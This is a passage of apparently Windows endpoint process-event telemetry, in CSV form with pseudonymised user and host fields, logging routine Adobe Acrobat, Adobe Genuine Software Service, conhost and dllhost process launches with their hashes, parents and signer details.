Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:17.314109+00:00,21452,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\KYB\FilePII_edd840c5ba4793ec460b8655ad56cb3a92e86a66.pdf""",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:24.875302100+00:00,2021-06-25 00:57:53.265394700+00:00,eefd8411-2a98-44ef-bb66-dcc1d1e30b0f,computerpii_0a470890c60768167990033d701e7bd881398861,182366,False,10.7740.19041.1052,False,11540474045178537,,11540474045178558,2021-06-25 00:57:17.314109+00:00,21452,2021-06-25 00:57:17.314109+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,21452,18560,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:29.174931300+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,1025.0,10.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+1193,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:26.215103200+00:00,3340,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\Form\FilePII_1e3cad41d0e75cc0e24229b8386ce9541d339cde.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:26.257330600+00:00,2021-06-25 00:57:53.266532+00:00,66674cbf-5d91-4d8a-a6c2-01920158a07b,computerpii_0a470890c60768167990033d701e7bd881398861,182380,False,10.7740.19041.1052,False,11540474045178163,,11540474045178559,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+1194,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:27.977457700+00:00,10308,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_ozcxwh 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:28.120273100+00:00,2021-06-25 00:57:53.267171400+00:00,4805fbf5-9ef5-456c-835d-f067cb27a1db,computerpii_0a470890c60768167990033d701e7bd881398861,182388,False,10.7740.19041.1052,False,11540474045136991,,11540474045178560,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,256,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1195,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:27.985912900+00:00,7436,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:27.977457700+00:00,10308,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_ozcxwh 3",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:28.120864700+00:00,2021-06-25 00:57:53.267250300+00:00,d1b5fae3-e301-460b-a032-8ea3ce17e5da,computerpii_0a470890c60768167990033d701e7bd881398861,182389,False,10.7740.19041.1052,False,11540474045178560,,11540474045178561,2021-06-25 00:57:27.977457700+00:00,10308,2021-06-25 00:57:27.977457700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,10308,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:57:27.988726700+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1196,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:28.980405800+00:00,19812,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_rjwcoi 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:29.012756300+00:00,2021-06-25 00:57:53.267324500+00:00,7226021d-19a5-488f-91e2-9791b0d71dc1,computerpii_0a470890c60768167990033d701e7bd881398861,182390,False,10.7740.19041.1052,False,11540474045136991,,11540474045178562,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1197,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:28.981051400+00:00,13908,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vfctcu 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:29.013030200+00:00,2021-06-25 00:57:53.267402400+00:00,06e145d7-d35d-48e0-8ea1-4f8f8c30099e,computerpii_0a470890c60768167990033d701e7bd881398861,182391,False,10.7740.19041.1052,False,11540474045136991,,11540474045178563,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1198,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:28.987692600+00:00,19372,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:28.980405800+00:00,19812,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_rjwcoi 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:29.014038400+00:00,2021-06-25 00:57:53.267479100+00:00,8e3525a8-4cf0-4ac7-88df-fe72bf72ebe6,computerpii_0a470890c60768167990033d701e7bd881398861,182392,False,10.7740.19041.1052,False,11540474045178562,,11540474045178564,2021-06-25 00:57:28.980405800+00:00,19812,2021-06-25 00:57:28.980405800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,19812,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1199,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:28.989461100+00:00,5240,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:28.981051400+00:00,13908,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vfctcu 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:29.014591+00:00,2021-06-25 00:57:53.267552900+00:00,91cf13ed-583a-439d-ad22-5ced7e2cc913,computerpii_0a470890c60768167990033d701e7bd881398861,182393,False,10.7740.19041.1052,False,11540474045178563,,11540474045178565,2021-06-25 00:57:28.981051400+00:00,13908,2021-06-25 00:57:28.981051400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,13908,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1200,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:29.214516600+00:00,2872,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vuzizj 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:29.244810800+00:00,2021-06-25 00:57:53.267912300+00:00,e8702bd0-dfd6-4660-8b5e-07de8b2ac533,computerpii_0a470890c60768167990033d701e7bd881398861,182398,False,10.7740.19041.1052,False,11540474045136991,,11540474045178566,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1201,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:29.227778500+00:00,15524,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:29.214516600+00:00,2872,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vuzizj 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:29.245526300+00:00,2021-06-25 00:57:53.268068+00:00,3b92cf46-a94b-4063-8370-222e9d29b49a,computerpii_0a470890c60768167990033d701e7bd881398861,182400,False,10.7740.19041.1052,False,11540474045178566,,11540474045178568,2021-06-25 00:57:29.214516600+00:00,2872,2021-06-25 00:57:29.214516600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,2872,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1202,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:31.005535500+00:00,16708,dllhost.exe,DllHost.exe /Processid:{FD2C8897-2BE8-459C-B8E4-0D2FCFD341F0},PortableExecutable,2020-10-09 20:47:47.793457100+00:00,C:\Windows\SysWOW64\dllhost.exe,19256,6f3c9485f8f97ac04c8e43ef4463a68c,3ed69caab035258e008efbcf40db305891b40ba02ca2737e20defa7c2d4afaf7,497b8ce238db644b7e1a16b417dbb5bc052a2684,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 